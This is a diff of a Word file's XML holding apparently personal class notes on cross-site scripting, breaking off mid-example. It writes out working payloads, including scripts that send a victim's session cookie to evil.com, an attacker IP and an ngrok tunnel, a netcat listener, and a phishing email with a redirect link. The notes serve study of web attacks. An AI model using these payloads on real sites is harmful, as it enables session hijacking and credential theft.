+    <w:p>
+      <w:r>
+        <w:t>- Using this malicious code, attackers can steal a victim’s credentials, such as session cookies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;&gt;&lt;/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>++++++++++</w:t>
+      </w:r>
+      <w:r>
+        <w:t>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>&gt;  Injection</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attack: XSS an attack resulting from an input validation failure that permits code to be input ... this unexpected code is then executed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>=&gt; Cookies: information stored in a browser and sent to a server with each resource request. A typical use is sending authentication credentials to the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>++++++++++</w:t>
+      </w:r>
+      <w:r>
+        <w:t>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Why is XSS </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Possible?:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>`````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:t>````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>- Absence of escape characters where they should be and turn code into plain text, for example, in search requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- The absence of filtering of attributes and their values in allowed tags</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+++++++++++</w:t>
+      </w:r>
+      <w:r>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Impact:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&gt; Cookie Theft [Session Hijack]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&gt; Keylogging</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&gt; Phishing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&gt; URL Redirection ...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_____________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Types:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>rXSS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">[ Reflected </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>XSS ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Reflected cross-site scripting is also known as </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Non-persistent</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cross-scripting. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ It is a cross-scripting attack where target servers reflect a malicious script. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ The attacker can include the payload into an error page, a search result, or the target server’s response to some request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>rXSS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lab:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://xss1.lab.hackintheclass.org</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://xss2.lab.hackintheclass.org</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>- a search form field that allows users to search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- enters the following search string to test out the issue search feature: xxx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- The search may </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>returns</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> no results that match the input string.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- However, the application echoes back the search term xxx in the response.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Use the payload: &lt;script&gt;alert('hacked</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>')&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>- However, a demonstration showing a JavaScript alert message doesn’t seem like much of a threat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- To fully understand and demonstrate the impact of a Cross-Site Scripting vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>- Evil Mail:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_____________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Title: Security Issue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">From: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>natasha</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Subject: Security Issue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Hi Alice, </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">I took a first pass at testing the latest release and found something interesting in the search feature. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">It's best you take a look at it for yourself, </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Regards,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Natasha</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>https://www.target.com/bob/blender/issues?query=&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.location</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'www.evil.com';&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Credential Theft: Success! Upon submitting her credentials to the fake login page, Alice's username and password are now logged on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>natasha's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Apache webserver!</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sXSS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">[ Stored </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>XSS ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Stored cross-site scripting is also known as Persistent cross-site scripting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ It is an attack where the hacker stores the malicious script/code on the targeted servers. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ The attacker usually tries to store the payload in the server’s persistent storage in some way.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ When a user requests the data, the server delivers legit data mixed with the malicious script, making every application’s user a potential victim of this </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sXSS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>payload:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.createElement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img.src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">="https://evil.com" + "/cookie=" + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>encodeURIComponent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.body</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.appendChild</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lvkp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>="http://attacker'sIP/cookie=+++++++" /&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Payload:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;script&gt;new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Image(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">="https://15fc-152-57-199-156.in.ngrok.io/?cookie=" + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://gochanakya.com/chanakya-details/Munna-MBBS-1509</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">&gt; DOM-XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">[ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">JavaScript </w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>- For the DOM-based XSS to take place, the JavaScript code of the web app takes input from a source that is controllable by the attacker, such as the URL in the browser’s tab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Unless adequate escaping or validation is performed for URL parameters, passing user-supplied input back into a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> or other web components is a common source of DOM Cross-Site Scripting (XSS) attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>NOTE: HTML DOM is a standard for how to add, update, delete or get HTML elements.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!DOCTYPE html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;html lang="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;title&gt;My Page&lt;/title&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   &lt;h1&gt;page&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>1. host on web server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2. Open chrome &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>visit:http</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>://192.168.1.111/1.html</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">3. Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Devloper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> tools console</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>4. run: &gt; document</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">NOTE: If you will use JavaScript to modify HTML </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!DOCTYPE html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;html lang="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">  &lt;title&gt;My Page&lt;/title&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>const</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>queryString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>location.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">; // Extract the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>queryString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from the URL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>const</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urlParams</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>URLSearchParams</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>queryString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">); // parse the </w:t>
